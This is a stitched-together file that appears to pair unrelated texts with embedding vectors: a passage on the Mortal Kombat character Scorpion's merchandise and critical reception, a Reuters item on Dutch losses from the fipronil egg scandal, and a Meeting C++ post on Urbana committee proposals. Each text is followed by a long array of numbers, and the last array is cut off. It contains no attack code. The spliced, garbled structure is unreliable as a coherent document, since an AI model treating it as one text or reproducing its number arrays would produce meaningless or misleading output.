season one, the resurrected Hanzo (now Scorpion) is convinced of Bi-Han's culpability in his family's and clan's deaths, not knowing that Bi-Han is not responsible and is instead incensed about the attack that he believes was carried out by his own Lin Kuei warriors. In the present day, Bi-Han and Scorpion fight in the Mortal Kombat tournament, during which Scorpion stabs his spear into Bi-Han's ankle. Despite Bi-Han's pleas that he was not involved in the death of his clan and family, Scorpion rips out his spine. This storyline was played out over the seventh and eighth episodes and filmed entirely in English. Dale said that the series "challenge[s] the assumptions that [Scorpion and Sub-Zero] have always been sworn enemies—we have new layers in their story and rivalries."[50] Promotion and merchandise [ edit ] Along with the original series characters, Scorpion was highlighted on an individual track from The Immortals' 1994 album Mortal Kombat: The Album. Titled "Lost Soul Bent on Revenge", it features a solo male singer with a falsetto vocal style resembling that of Jimmy Somerville, and the lyrics consist only of the repetition of the song title and voice samples of both spear taunts from the first game. The character has featured in various types of merchandise during his tenure in the MK series, mostly action figures and sculptures. Hasbro released the first Scorpion figures in 1994: a 3.75" version in which his mask was blue and he was packaged with a plastic scorpion accessory, then a twelve-inch figure whose design and packaged weaponry were more in line with the games. Toy Island distributed a Scorpion figure in 1996 as part of their MK Trilogy collection, which included a pair of hookswords, and Infinite Concepts put out a Scorpion figure in 1999. Jazwares released a 6" Deception figure in 2005, and a 2006 Shaolin Monks figure that was also included as part of a Hot Topic-exclusive two-pack with Sub-Zero,[51][52] in addition to a collection of figures in 2011: a 4" figure from their MK2011 line,[53] a "Klassic" four-incher,[54] and a "Retro" figure that featured an interchangeable skull head and which was packaged with Sub-Zero, Reptile and Smoke in a box set.[55] Syco Collectibles released a host of Scorpion merchandise in 2011-2012: 10" (with glow-in-the-dark eyes) and 18" polystone statues,[56][57] along with two busts—a 1:2 scale with a 15" base and light-up eyes; and a smaller bust with an 11" base that featured a detachable head.[58][59] Pop Culture Shock distributed a life-sized bust in 2011 that featured removable shoulder pads and light-up eyes,[60] as well as a 19" statuette based on his UMK3 design as part of their "Mortal Kombat Klassics" collection.[61] A 16.5" mixed-media statue was released by the company in 2012, in which Scorpion was sculpted in a spear-throwing pose and was outfitted in all black.[62] Scorpion was one of thirteen MK2011 characters depicted on life-sized standing cardboard cutouts from Advanced Graphics.[63] Funko released a Scorpion bobblehead in 2011,[64] and he was one of twenty characters featured on 2.5" x 3.5" collectible magnets by Ata-Boy Wholesale that year.[65] He appeared along with Kabal, Quan Chi, and Shao Kahn in a collection of 2.5" super-deformed figures released by Jazwares in 2012.[66] Reception and legacy [ edit ] Cultural impact [ edit ] The character has made several cameo appearances in television programs, including in the animated series Drawn Together (2005 episode "The One Wherein There Is a Big Twist: Part 2"), Robot Chicken (2005 episode "S&M Present"), and The Cleveland Show (2010 episode "Another Bad Thanksgiving"). Professional wrestler Cody Rhodes dressed up as Scorpion for Halloween in 2013.[67] Scorpion was featured along with Raiden, Ermac, Jax, and Shang Tsung in Comedy Central's 2014 animated short film parodying Mortal Kombat, in which he was renamed "Iron Shogun" and was to compete in "Yao Zhang's" (Shang Tsung) underground tournament before it is delayed due to the other contestants being no-shows. With Zhang unable to find a replacement, Iron Shogun is declared the tournament victor after he fatally spears a pizza deliveryman who enters the arena.[68] Critical reception and popularity [ edit ] Scorpion is often regarded as one of the most popular and iconic characters in the Mortal Kombat franchise, and in the fighting-game genre in general. SuperGamePower gave him and Ryu from Street Fighter a shared award for the best fighter of 1996.[69] Game Informer rated Scorpion the third best fighting game character in 2009,[70] while UGO Networks ranked Scorpion second only to the series' main protagonist Liu Kang in their 2012 list of the top characters in the franchise.[71] Scorpion was rated the third best ninja character in video games by Cheat Code Central in 2011,[72] and PLAY similarly ranked him fourth on their own list in 2013.[73] Lucas Sullivan of GamesRadar ranked him as the seventh best fighting game character in the genre's history, stating, "Scorpion has some tough competition in the MK franchise, but none come close to the sheer coolness of his 'undead antagonist' factor. Despite the fact that he started out as a mere palette swap, Scorpion’s appeal made him a frontrunner in every major MK game to date."[74] Complex featured Scorpion in a whole host of best-of lists: he was ranked the fifth most brutal fighter in the series[75] and the 15th best video game mascot,[76] in addition to the fourth "most dominant" fighting game character,[77] the 23rd "most badass" video game character of all time,[78] and one of video game characters who deserved their own spinoff title: "[W]hether you want to admit it or not, Scorpion runs the [MK] series more than Liu Kang ever has."[79] In 2008, IGN wrote that although Scorpion was initially a palette-swapped character, he "is actually a lot more complicated than these initial appearances let on;"[80] In 2013, he was named runner-up to Kratos as the "most bad-ass" video game character by The Ultimate Gamer.[81] Scorpion was voted the series' greatest character in a 2013 fan poll hosted by Dorkly,[82] and finished third behind Raiden and Smoke in the annual "Supreme Mortal Kombat Champion" fan polls hosted by Mortal Kombat Online in 2013[83] but was eliminated in the lower rounds in 2012 and 2014.[84][85] As Scorpion is regularly intertwined with Sub-Zero throughout the series, they have often been paired together in regards to critical reception. They tied for second on WatchMojo's 2012 list of the most iconic fighting game characters,[86] placed fourth on their 2013 list of the top ten video-game ninjas,[87] and shared the fifth spot on the top video-game ninja list by PC World in 2009.[88] He tied with Sub-Zero at the top of Game Revolution's 2006 list of the top ten "old school" MK characters,[89] and a 2011 GamesRadar article discussed their evolution across the Mortal Kombat series, citing them as its two most popular characters.[90] Together, Scorpion and Sub-Zero were voted the fifth most iconic characters in the two decades of the PlayStation by readers of PlayStation Official Magazine – UK in 2015.[91] Scorpion also placed third, just behind Sub-Zero, in a 2016 readers poll by Hobby Consolas for the most popular character in all fighting games, with the staff noting him defeating the likes of Kazuya Mishima, Chun-Li, Fulgore and even Goku.[92] GamePro ranked Scorpion, Sub-Zero, and the other ninjas from the series third in their 2009 list of the best palette-swapped video game characters, adding that Midway Games "has turned the art of making new characters from other, different-colored characters into a science."[93] Robert Naytor of Hardcore Gaming 101 considered Ermac to be "a better fit" than Scorpion for appearing in Psi-Ops: The Mindgate Conspiracy, "given how much telekinesis is used throughout the game."[94] Special moves and Fatalities have been mostly very well received, too. In 2010, IGN listed Scorpion's "Flaming Skull" as the second best MK Fatality without specifying any particular title in the series, due to how the player's perception of the character changes when he removes his mask.[95] They called it an "enduring classic", noting that the finisher was notably unchanged in future games as a result of its connection with the character.[96] His spear attack was ranked by IGN as the 76th top video-game weapon in 2012,[97] and ninth in GameSpot's 2002 list of the top ten fighting-game special moves of all time as the single most powerful yet balanced attack in the original game, as well as for its initial shock value, while deeming it "the definitive Mortal Kombat move."[98] The "Nether Gate" from MK2011 was included by FHM on their list of the game's nine most brutal Fatalities.[99] His MKII Friendship, shared with Sub-Zero and Reptile, placed in Prima Games' 2014 list of the series' top 50 Fatalities, in addition to the "Nether Gate", his stage Fatality from MK2011, and the "Flaming Skull" from the original MK.[100][101][102] We Got This Covered ranked the "Nether Gate" among the reboot's top finishers: "Sub-Zero does another spine rip in this game, but it’s not as repulsive as it was a decade ago. Scorpion, however, has found a new way to use his favorite weapon for maximum damage."[103] Paste rated it the fourth best Fatality from MK2011, in addition to rating the "Flaming Skull" as the third best finisher from the first game.[104] Complex ranked the "Flaming Skull" last in their list of the 20 best MK finishing moves in 2013, calling it "creepy to the max."[105] However, his Animality from UMK3/Trilogy (a penguin that lays an exploding egg) tied with that of Rain as the eighth worst finisher in the series according to GamePro.[106] Scorpion's catchphrase "Get over here!" was listed in PLAY's joke list of ten best chat-up lines.[107] According to PlayStation Universe in 2011, Scorpion "has spawned one of the most iconic catchphrases in gaming history" and "remains a firm fan favorite nineteen years since his debut."[1] The phrase was a factor in ScrewAttack ranking Scorpion first on their list of the top series characters.[108] See also [ edit ] Media related to Scorpion at Wikimedia Commons
[ -0.01202355045825243, 0.007487125229090452, -0.06669575721025467, -0.06295918673276901, 0.0019771454390138388, 0.03681630641222, 0.0456688366830349, 0.04180688038468361, 0.02048385888338089, 0.07659179717302322, 0.062239568680524826, -0.0869300588965416, 0.04896357282996178, 0.020051874220371246, 0.07276944071054459, -0.004033292643725872, 0.0674237310886383, 0.028224904090166092, 0.07977653294801712, -0.01069550309330225, -0.034842830151319504, 0.02082418091595173, -0.015479857102036476, -0.010347661562263966, -0.08277935534715652, 0.0489458292722702, 0.005359381902962923, 0.0076258303597569466, -0.030247801914811134, -0.10318353772163391, -0.0390382818877697, 0.04854532703757286, -0.09700262546539307, 0.01980970986187458, -0.057490140199661255, -0.054128579795360565, -0.08202336728572845, 0.08317986875772476, -0.051734697073698044, -0.03458864614367485, -0.05265926569700241, 0.01900879293680191, -0.058955028653144836, -0.005857678595930338, 0.02183440513908863, -0.0625433698296547, -0.05226429924368858, -0.12301527708768845, 0.08550294488668442, -0.03066377528011799, 0.03839047998189926, 0.0008168309577740729, 0.1045490950345993, 0.046178579330444336, 0.05165846645832062, -0.10727357119321823, -0.0445421077311039, 0.03427208587527275, 0.05163796618580818, 0.020565051585435867, 0.004780452698469162, 0.04096422344446182, 0.022924719378352165, -0.019723473116755486, 0.031673163175582886, -0.03503214567899704, 0.033238526433706284, -0.030528414994478226, -0.04814338684082031, -0.03521246463060379, -0.056392401456832886, -0.06247711926698685, -0.01932242512702942, 0.048908259719610214, -0.0745566114783287, -0.03146666660904884, 0.09993637353181839, 0.07275913655757904, -0.029781334102153778, 0.012393603101372719, 0.0698888897895813, 0.043890178203582764, -0.0750383511185646, -0.00005897400842513889, 0.03155180439352989, 0.13347752392292023, -0.07016967982053757, 0.042209479957818985, 0.019614364951848984, 0.02133120596408844, -0.014590087346732616, 0.07019735127687454, 0.09577248990535736, -0.023541463539004326, 0.009345410391688347, -0.03292250633239746, 0.057040899991989136, 0.06136036664247513, -0.024523993954062462, 0.07840559631586075, -0.0021445173770189285, -0.014404576271772385, -0.012924307957291603, 0.004144598729908466, 0.03289474546909332, 0.023721149191260338, 0.0826159194111824, -0.010654248297214508, -0.015421495772898197, 0.02729172259569168, -0.07809432595968246, -0.06380987912416458, -0.0850924625992775, 0.0032959873788058758, 0.11084579676389694, 0.05055121332406998, -0.0266964640468359, 0.018542412668466568, -0.04415053129196167, -0.01699337363243103, 0.11630814522504807, 0.035067375749349594, 0.008890227414667606, 0.10829029977321625, 0.07320115715265274, 0.039634834975004196, -0.07645067572593689, 4.615921665917358e-33, 0.02364540658891201, 0.050966452807188034, -0.01871870830655098, 0.003318530973047018, -0.05005586892366409, -0.08976688235998154, -0.019402550533413887, 0.049912381917238235, -0.06014162302017212, 0.0348755419254303, -0.028124365955591202, 0.005051578860729933, -0.027927128598093987, 0.023581506684422493, -0.025796208530664444, 0.022842589765787125, -0.029761306941509247, -0.07765118777751923, -0.002183849224820733, -0.05908532068133354, -0.02659149095416069, 0.032776642590761185, -0.02000998705625534, -0.011311819776892662, 0.027623161673545837, 0.06525978446006775, -0.05261826142668724, -0.01444251835346222, -0.009430279955267906, -0.0034094718284904957, -0.08972840756177902, 0.032728977501392365, 0.023760732263326645, 0.08334657549858093, -0.04423016682267189, -0.04727194830775261, -0.07731837034225464, -0.01990613341331482, -0.04333687573671341, 0.024517392739653587, 0.09987527132034302, 0.011862051673233509, -0.1285410374403, -0.00242937752045691, 0.003687951946631074, -0.08713127672672272, 0.03033212386071682, -0.027825327590107918, 0.0012173799332231283, -0.07429090142250061, -0.037286426872015, 0.027699388563632965, 0.02560560405254364, 0.040842022746801376, -0.0058470782823860645, -0.008491248823702335, 0.06430471688508987, -0.1017184779047966, -0.0678999200463295, -0.006339420564472675, -0.044893112033605576, -0.04286480322480202, -0.059469543397426605, 0.03217405825853348, -0.023283349350094795, -0.03147237002849579, -0.042123064398765564, -0.0027655723970383406, 0.060564614832401276, -0.096932053565979, 0.03431612253189087, -0.031168710440397263, 0.04820561781525612, 0.011566303670406342, 0.024916216731071472, -0.054448504000902176, -0.0619625560939312, 0.09866707772016525, -0.09776275604963303, 0.08312054723501205, 0.027872813865542412, 0.0173236895352602, 0.012742913328111172, 0.008786539547145367, 0.0598374605178833, 0.04527237266302109, 0.07529176771640778, -0.08097612112760544, -0.04467058926820755, -0.04703134670853615, 0.005090492311865091, -0.09291661530733109, 0.07926005870103836, 0.02203403413295746, 0.0039681424386799335, -5.1901686560512926e-33, -0.030427983030676842, 0.03673862665891647, -0.040502723306417465, -0.002297266386449337, 0.03884457051753998, -0.011405996978282928, -0.04635651037096977, 0.0828893780708313, -0.09438667446374893, -0.06209230795502663, 0.012247218750417233, 0.05795859545469284, -0.01670876331627369, -0.06597903370857239, 0.08525292575359344, -0.025242483243346214, -0.0038757165893912315, 0.045561257749795914, 0.008611449971795082, -0.013570251874625683, 0.11563622951507568, -0.020251501351594925, -0.02419697865843773, -0.06512455642223358, 0.017084896564483643, 0.07517873495817184, 0.0856608897447586, 0.06593133509159088, -0.005400029011070728, 0.05924300104379654, -0.020524147897958755, 0.03982040658593178, 0.0940941795706749, -0.07542115449905396, 0.06369002163410187, -0.043649740517139435, -0.1081150472164154, 0.011321505531668663, -0.032863207161426544, -0.006559943314641714, -0.011937393806874752, 0.030105385929346085, -0.05337783694267273, -0.03228553757071495, 0.039542604237794876, 0.010946870781481266, 0.06828778237104416, 0.03274761140346527, 0.04743505269289017, -0.06525254994630814, 0.04001510888338089, -0.019492603838443756, 0.04120370373129845, -0.009135781787335873, -0.01670984737575054, 0.03192533925175667, -0.05701408162713051, 0.04595843330025673, 0.1046963557600975, -0.017496461048722267, 0.03770672157406807, 0.01974489353597164, 0.018700633198022842, 0.02374015934765339, 0.0020960343535989523, -0.01363853644579649, 0.006260148715227842, 0.025774799287319183, -0.07026857137680054, -0.030247576534748077, -0.03321338817477226, -0.05133749172091484, -0.01538284495472908, -0.020360926166176796, 0.01761445589363575, -0.020811375230550766, -0.07128322124481201, 0.013193686492741108, 0.03248048573732376, -0.01333298347890377, -0.12920989096164703, 0.0149094732478261, -0.07108364254236221, 0.07939671725034714, 0.002456102753058076, 0.04434497281908989, -0.06825025379657745, 0.008879642933607101, 0.017564160749316216, -0.049032796174287796, 0.08567909151315689, -0.007871950045228004, 0.015222664922475815, 0.00013243618013802916, -0.05011077597737312, -5.667082092486453e-8, 0.06271428614854813, -0.0447993166744709, -0.060613010078668594, -0.031354643404483795, 0.02370758168399334, 0.07131064683198929, 0.008313428610563278, -0.12224694341421127, 0.005906295496970415, 0.11476178467273712, 0.019017046317458153, 0.042984869331121445, 0.02153046801686287, -0.027965350076556206, 0.03971686214208603, 0.03688739612698555, -0.02668287791311741, 0.04368723928928375, -0.022118711844086647, 0.0027507462073117495, 0.027453355491161346, -0.00926790852099657, 0.012439819052815437, -0.04370092228055, -0.022420508787035942, -0.020131906494498253, -0.0662623941898346, -0.012401188723742962, 0.033987659960985184, 0.053612709045410156, -0.07221000641584396, 0.053881075233221054, 0.03887774050235748, -0.04349927604198456, 0.04027005657553673, 0.024888381361961365, 0.05943887308239937, -0.01902681216597557, 0.025698596611618996, -0.015179028734564781, 0.01367088221013546, 0.005047108978033066, -0.027538280934095383, 0.023339111357927322, 0.00046950671821832657, -0.02278140000998974, 0.004011313896626234, -0.058791130781173706, -0.0050430260598659515, -0.1596316695213318, 0.028741152957081795, 0.09185865521430969, -0.047261547297239304, -0.09238097816705704, -0.02640991099178791, 0.028447138145565987, -0.0012659747153520584, -0.005686433985829353, 0.011376959271728992, 0.004349231719970703, 0.05394652858376503, -0.07152696698904037, -0.014308284036815166, 0.022009557113051414 ]
AMSTERDAM (Reuters) - Dutch chicken farmers have suffered around 33 million euros ($39 million) in damages as a direct result of culls and other measures carried out after their eggs were found this month to be tainted with a toxic chemical. The estimate, calculated by the University of Wageningen at the request of the Dutch Ministry of Economic Affairs, was sent to parliament on Wednesday ahead of a debate on how the affair has been handled. Investigators in early August detected fipronil, a flea poison, in slightly higher than acceptable levels on Dutch chicken farms, leading quickly to culls, quarantines and other measures to prevent further production of contaminated eggs.. In the following days, millions of Dutch chicken eggs and products containing egg were recalled in countries around Europe and as far away as Asia. Two Dutch men who ran the cleaning company Chickfriend were arrested and continue to be held in the Netherlands on suspicion of threatening public health for using the chemical on chicken farms. Belgian authorities are investigating whether the Belgian firm that sold Chickfriend a cleaning product containing fipronil was also aware, complicit or responsible for it entering the food chain. The university’s calculation of the damages to around 200 Dutch chicken farms did not attempt to measure the probably greater financial damages caused by the international egg recalls. ($1 = 0.8479 euros)
[ -0.009450897574424744, -0.025738438591361046, 0.0312858447432518, -0.018417123705148697, 0.11315396428108215, 0.02733013592660427, 0.034244753420352936, 0.07317355275154114, 0.024015631526708603, -0.022845828905701637, 0.05115677788853645, -0.024166077375411987, -0.07927941530942917, 0.032921385020017624, -0.11997388303279877, -0.04975903779268265, 0.029607677832245827, -0.03657113015651703, -0.003224549349397421, -0.0005793898017145693, -0.04412117600440979, -0.07508298754692078, 0.11283082515001297, -0.04627591371536255, -0.07058536261320114, 0.023579053580760956, 0.01446173433214426, -0.04840485006570816, -0.03379526734352112, -0.01610836759209633, 0.015415863133966923, 0.025402501225471497, -0.04910411685705185, 0.0034901576582342386, 0.011039089411497116, -0.031605351716279984, -0.006323130801320076, -0.017372258007526398, 0.0016320497961714864, -0.02003658376634121, 0.0690947026014328, -0.1140899658203125, -0.07397982478141785, -0.08529076725244522, -0.015394600108265877, 0.03626350313425064, -0.005410419311374426, 0.02170559950172901, -0.033689554780721664, -0.02856200560927391, 0.005722297355532646, 0.005917033180594444, 0.02667604759335518, 0.03578948602080345, -0.010879759676754475, -0.04965812340378761, -0.007549356669187546, -0.05931347608566284, -0.10039675235748291, 0.03493613377213478, -0.05589109659194946, -0.010077478364109993, -0.015378367155790329, -0.02611450105905533, 0.02796042710542679, -0.005613161250948906, -0.04045744985342026, 0.043360862880945206, 0.007735781371593475, 0.04382693022489548, 0.06539902091026306, -0.08085698634386063, -0.020046522840857506, 0.046882499009370804, 0.012308175675570965, 0.11243389546871185, -0.013829108327627182, -0.02834642305970192, 0.03167511150240898, -0.06311898678541183, 0.0018269377760589123, 0.005547918379306793, 0.04038970172405243, -0.04004031419754028, 0.05282994359731674, -0.006756804883480072, 0.03176393359899521, 0.01050667092204094, 0.0928332582116127, -0.011657053604722023, 0.1078169196844101, -0.007972079329192638, 0.0417403019964695, 0.024779677391052246, 0.11641595512628555, 0.04419911652803421, 0.04275607690215111, 0.010430420748889446, 0.0087618138641119, 0.005849743261933327, -0.024632740765810013, -0.016150139272212982, -0.074611134827137, -0.1038912758231163, -0.033894360065460205, -0.002041430911049247, 0.03259173780679703, -0.06729654967784882, 0.07517580687999725, 0.053177718073129654, -0.09315624088048935, 0.04155884310603142, 0.0019269027980044484, -0.026471998542547226, 0.022734399884939194, 0.02728167735040188, 0.04793303459882736, -0.054939284920692444, 0.04680706188082695, -0.024127328768372536, 0.04300716519355774, -0.0006638705381192267, -0.006150912959128618, 0.037921082228422165, 0.033543311059474945, 0.07985594868659973, -0.029972650110721588, 2.9442704350671763e-33, -0.047163400799036026, 0.04318868741393089, 0.057307396084070206, -0.02771078608930111, 0.024988772347569466, -0.015621603466570377, -0.024911988526582718, -0.005329290870577097, 0.09137217700481415, 0.015221084468066692, -0.04701245576143265, -0.0513400137424469, -0.05869528651237488, -0.02712923102080822, 0.04391420632600784, -0.0013093891320750117, 0.0648500844836235, 0.023371735587716103, 0.07753430306911469, 0.02082429826259613, -0.0014145704917609692, -0.05985862761735916, 0.006028821226209402, 0.09812092781066895, -0.041757792234420776, 0.027780087664723396, -0.09350760281085968, -0.012332198210060596, 0.020597267895936966, 0.01580158807337284, 0.08020449429750443, -0.04813430830836296, 0.021873831748962402, 0.010038068518042564, -0.11986371874809265, 0.05220957100391388, -0.029954249039292336, -0.07698000967502594, -0.06894741952419281, 0.03007527068257332, 0.05390895903110504, -0.11075503379106522, 0.10178280621767044, 0.04233557730913162, -0.015800705179572105, -0.05521612986922264, -0.18179431557655334, -0.03168054297566414, -0.06635868549346924, 0.02369249053299427, 0.01427237968891859, -0.01426894310861826, 0.04125620052218437, -0.09575293213129044, 0.0026616209652274847, 0.050740670412778854, -0.019670985639095306, -0.044653404504060745, 0.04327813535928726, 0.08341436833143234, -0.02592363953590393, 0.08154668658971786, -0.01900569163262844, -0.00022060543415136635, 0.019903449341654778, -0.0915592834353447, -0.02196766994893551, 0.005825976841151714, -0.10471594333648682, 0.06277400255203247, 0.005690531339496374, 0.027207423001527786, 0.018296707421541214, -0.04241584241390228, 0.026179062202572823, 0.010404848493635654, -0.047896016389131546, 0.06877679377794266, 0.07678215205669403, -0.04797912761569023, 0.08846353739500046, -0.00795459933578968, -0.03877360001206398, -0.021379929035902023, -0.08355540037155151, 0.025704480707645416, -0.027680890634655952, 0.029534775763750076, 0.06703711301088333, 0.05886233225464821, 0.06516844034194946, -0.05459217727184296, -0.004205853212624788, -0.0020492393523454666, -0.05870408937335014, -4.13280634469886e-33, -0.08242010325193405, -0.0037215708289295435, -0.07135890424251556, 0.02712610363960266, 0.02279118448495865, -0.03344563767313957, -0.03589298948645592, 0.013670951128005981, 0.04697602987289429, -0.04234226420521736, -0.05219597369432449, -0.1053895354270935, 0.04419361799955368, 0.0593867152929306, -0.03654344752430916, 0.0943545326590538, 0.008345331996679306, 0.004694441799074411, 0.015014375559985638, -0.04471934959292412, -0.0418834425508976, -0.021933021023869514, 0.06370562314987183, 0.14574167132377625, -0.09288696944713593, 0.06462965160608292, 0.04411216825246811, -0.017767643555998802, -0.008408533409237862, -0.0629439726471901, -0.004935150500386953, 0.050398509949445724, -0.019770143553614616, 0.05551108345389366, -0.04723159596323967, -0.02322123572230339, 0.05915303900837898, -0.04649413749575615, 0.02063441090285778, -0.06758807599544525, 0.01729138009250164, 0.03092990256845951, -0.0947793647646904, 0.011952340602874756, -0.030281249433755875, -0.01103842630982399, 0.0091127660125494, -0.09210014343261719, 0.10670290887355804, -0.05525090545415878, 0.002634878270328045, 0.07621388882398605, 0.015079531818628311, -0.04900333657860756, -0.026021087542176247, 0.04669651389122009, 0.041809167712926865, -0.08935413509607315, 0.019151214510202408, 0.07978987693786621, -0.029686937108635902, 0.06300753355026245, -0.03617704659700394, 0.07070960104465485, 0.05363624170422554, -0.010675559751689434, -0.05368305370211601, 0.042659107595682144, 0.054902333766222, -0.12360216677188873, 0.034942418336868286, 0.04957965761423111, 0.019480567425489426, -0.06757859140634537, -0.0326373465359211, -0.026350773870944977, 0.05249308422207832, 0.0010274274973198771, -0.03761642053723335, -0.0019174960907548666, 0.04298437386751175, -0.14772343635559082, 0.020401332527399063, -0.03446711227297783, -0.043480515480041504, -0.05348992347717285, 0.020145973190665245, 0.011236628517508507, -0.012960811145603657, -0.008699828758835793, -0.038353998214006424, -0.021064873784780502, -0.04593120142817497, 0.08247639238834381, 0.06875631958246231, -4.716847001873248e-8, 0.021771609783172607, -0.03853219002485275, 0.014338206499814987, 0.05651702359318733, 0.08974628150463104, -0.03392113000154495, -0.046388301998376846, 0.017930930480360985, -0.025033270940184593, 0.001723875175230205, -0.101143978536129, 0.0665326938033104, -0.029544692486524582, 0.00841586571186781, 0.011508285067975521, 0.026661483570933342, -0.040382519364356995, 0.03897225111722946, -0.004597311373800039, 0.04540712386369705, -0.006739672739058733, 0.11599482595920563, -0.05367574468255043, -0.0341370515525341, -0.011692192405462265, 0.01044618058949709, 0.06353770941495895, 0.05130122974514961, 0.05087349936366081, -0.017611421644687653, -0.06859312951564789, 0.00008286697266157717, 0.010368674993515015, 0.04966478794813156, -0.027224797755479813, -0.09302474558353424, -0.024650003761053085, -0.0015955989947542548, -0.0029891165904700756, 0.044876858592033386, -0.039960041642189026, 0.030821392312645912, -0.027625657618045807, -0.020170556381344795, -0.005433503072708845, -0.024770041927695274, -0.11067423969507217, -0.007062302902340889, 0.0309673510491848, -0.06967220455408096, -0.017441457137465477, 0.050403520464897156, 0.04827393963932991, 0.043086860328912735, -0.010952195152640343, -0.005546271335333586, 0.02630547247827053, -0.0259513258934021, 0.013318494893610477, -0.034773409366607666, -0.04064438119530678, -0.05567043274641037, 0.06842309981584549, 0.08546095341444016 ]
Looking for C++17 - Urbana Proposals from Core, Modules, Networking, Reflection and Undefined Behavior published at 01.11.2014 12:56 by Jens Weller The second part of my series about the proposals for Urbana, where the next C++ committee meeting will be held. The papers grand us a first view on a distant future - C++17. I also published last weekend an alternative listing of the proposals by mailing and subgroup. And maybe you also want to read the first part about proposals for concurrency. This time it will be all subgroups with relative few papers combined, evolution and library then will follow with one or two postings each. I might get interrupted by my conference though... Core The core working group deals with the language as it self, so its proposals are really a bit special. From the paper: This paper proposes to adjust the wording for exceptions to achieve the following goals: Exception specifications as a semantic concept are separated from the grammar term exception-specification The description of throw-expression is integrated into clause 5. The changes are intended to be editorial only, not changing semantics. Due to the size of the changes, it seems prudent to have a full CWG review for these instead of leaving the issue to the project editor alone. Not much more to say. Wording only. From the paper: This paper presents the proposed resolution for core issue 330 as reviewed in teleconferences of WG21's Core Working Group, substantially cleaning up the wording around qualification converions. Other than allowing the qualification conversions asked for in the issue, it also changes reinterpret_cast so that it may now cast away constness So, this is another very detailed paper on a very special issue. I guess most people could ignore it, but it shows to what details the committee works on C++. Standardization is just not about adding new features, it is also about keeping the standard valid in a logical and very detailed way. String-literals have five encoding-prefixes, while character literals only have 4. u8 is the missing one, which this paper seeks to fix, adding u8 as an encoding prefix for character literals. Again, this paper is mostly the changes in wording for the C++ Standard. This is a first draft of the technical specification about the needed extensions to C++ for making Concepts a reality. Keypoints which will need to be added to C++ for Concepts is adding and defining the new keywords concept and requires. While technical specifications do define what C++17 will look like, they are also because of this nature very detailed and oriented to the standards sections. This makes them not the best read on most of their topics they are trying to standardize, the proposals are often better for human readers. For concepts, I think the best way to be informed is watching Andrew Suttons talk about them from CppCon. Modules This is the current state about the plans for integrating modules in C++. The authors name the current 4 goals of such a system: componentization isolation of macros scalable build support for modern semantic-aware developer tools The problem for C++ and modules is, that the from C inherited build system takes a different approach, every file is in this model its own translation unit, which is compiled without the knowledge about dependencies to other translation units, this is later resolved by the linker. This is very effective, but also lowlevel. Also, the authors point out, that this linkage model is 40 years old, and with integrating modules in C++, needs to adapted or replaced. The module system is designed to coexist with the preprocessor, but will not depend on it. A central tenet of this proposal is that a module system for C++ has to be an evolution of the conventional compilation model. The immediate consequence is that it has to inter-operate with the existing source file inclusion model while solving the significant problems and minimizing those that can’t be completely solved. A short overview on the planned features for modules: module and import are new keywords import is a replacement for include, the named model then gets imported into this translation unit module module-name; declares a new module, a module has no scope for scoping namespaces exist. you can only declare one module per translation unit a module has to use export for its entry points, which form the modules interface export toplevel-declaration macros cannot get imported or exported This would be really cool to have in C++17, and the current proposal could really show a way how a module system for C++ could look like. Yet it will be very interesting to see how this proposal evolves in the coming year. Networking / Library This proposal seeks to add a library derived from boost asio to the C++ Standard. New in this revision is that the code has been updated to C++14, by request of the Library Evolution Working Group. The authors refer to boost::asio as the best introduction, but also include an tcp uppercase echo server as an example how a standard asio version would look like. The library has a synchronous and an asynchronous part, which works with handlers, in the examples those are lambdas. The goal of this proposal is to add support for udp and tcp sockets, including support for multicast client and server applications scalability to handle many concurrent connections Protocol independence between IPv4 and IPv6 name resolution timers to the C++ Standard, out of scope of this document are: Protocols such as HTTP, FTP, SMTP, but also ICMP Encryption (SSL/TLS) OS specific APIs Reflection Some applications are designed to never return, so also main is not returning when they are properly run. To prevent the call to destructors registered with atexit, the authors propose to add an optional[[noreturn]] attribute to main. Implementations then can make use of this hint and implement optimizations based on this. The authors also bring into discussion if for this not new versions of main should be added to the standard: void main() without and with arguments. It has been proposed to add defaulted comparison operators to C++ (N4114/N4175/N4176) by extending the core language, this paper proposes a different solution, to implement defaulted comparison operators using reflection traits, which are proposed in N4113. The authors propose a type trait generate_comparison<T>, which defaults to true, so that the comparison operators get generated, so that you need to specialize it to false to suppress generation. The authors also discuss the opposite, that the default is false, and that you'd have to specialize to true or derive from with_default_comparisons. The comparison operator is implemented with a default_tie template which enumerates the members of a class into a std::tie function for comparison: template<class C> auto default_tie(const C& c) { constexpr size_t n = std::class_member::list_size_v<C>; return default_tie_impl(c, std::make_index_sequence<n>()); } This implementation uses the reflection traits from N4113. Undefined Behavior There are some issues with the current specification of universal-character-name (UCN), which this paper tries to address. UCNs were introduced to C and C++ to allow internationalization without depending on source text encoding. The two main goals of this paper are: to limit or fully remove undefined behavior from the UCN specification to handle corner cases, which are yet not defined as undefined behavior This paper deals with preprocessor and undefined behavior. It also updates the specification for the preprocessor to deal with C++11 lexical extensions (e.g raw-strings, user defined literals and new encoding prefixes). It aims at removing undefined behavior further from the preprocessor and adding missing specifications. Join the Meeting C++ patreon community! This and other posts on Meeting C++ are enabled by my supporters on patreon!
[ -0.012972642667591572, -0.014141207560896873, 0.08412709832191467, -0.024249471724033356, 0.018843969330191612, 0.03645028546452522, -0.0919063612818718, -0.007170919794589281, -0.08563821017742157, -0.0010560551891103387, -0.009258164092898369, -0.049337238073349, -0.05324946716427803, -0.05685862898826599, -0.03067622147500515, -0.005881773307919502, 0.037342846393585205, 0.010968002490699291, -0.006097014993429184, 0.011111492291092873, -0.011882031336426735, 0.008419813588261604, -0.011388649232685566, 0.017654499039053917, 0.02087746560573578, -0.00010239682160317898, -0.06726256757974625, -0.070103220641613, 0.05004489794373512, 0.02896452695131302, -0.0247330479323864, 0.10609990358352661, -0.00007952753367135301, 0.058845169842243195, 0.09093587100505829, 0.016728341579437256, 0.01295190118253231, -0.07474198937416077, 0.019608059898018837, -0.046036671847105026, -0.03718039393424988, 0.012704205699265003, -0.033934805542230606, 0.004657471552491188, -0.010346212424337864, -0.05817077308893204, 0.004410130437463522, 0.005912151653319597, -0.12391259521245956, 0.013279655016958714, 0.03287786990404129, -0.08064568042755127, 0.06989488005638123, 0.003929939121007919, 0.049588870257139206, -0.0041212886571884155, -0.03137531876564026, -0.029598208144307137, 0.03800538554787636, -0.05613217130303383, 0.027393614873290062, -0.05770549923181534, -0.07085052132606506, -0.013000489212572575, 0.04176709055900574, 0.0009470075601711869, 0.014610798098146915, 0.09123330563306808, 